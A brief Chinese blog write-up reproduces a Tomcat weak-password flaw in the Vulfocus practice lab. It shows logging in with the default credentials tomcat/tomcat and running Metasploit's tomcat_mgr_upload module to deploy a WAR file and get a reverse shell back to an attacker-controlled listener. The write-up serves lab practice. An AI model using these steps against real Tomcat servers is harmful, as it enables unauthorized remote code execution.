Tomcat弱口令

背景:
Zab Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell。

漏洞编号:

影响版本:
弱口令

复现步骤:
1,打开漏洞环境vulfocus

2,访问URL点击Manager App

3,验证弱口令,输入默认账号密码tomcat tomcat

4,使用msf进入exploit/multi/http/tomcat_mgr_upload模块

5,依次设置

set rhost vulfocus.fofa.so
set rport 60231
set httpusername tomcat
set httppassword tomcat
set lhost VPS IP
set lport 6666

6,run

7,查看flag

posted @   Colin.B  阅读(1073)  评论(0编辑  收藏  举报
相关博文:
· Yapi代码执行
· Apache 文件上传CVE-2017-15715
· tomcat漏洞复现
· tomcat弱口令&war远程部署
· Vulfocus靶场 | tomcat-pass-getshell 弱口令
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效
点击右上角即可分享
微信分享提示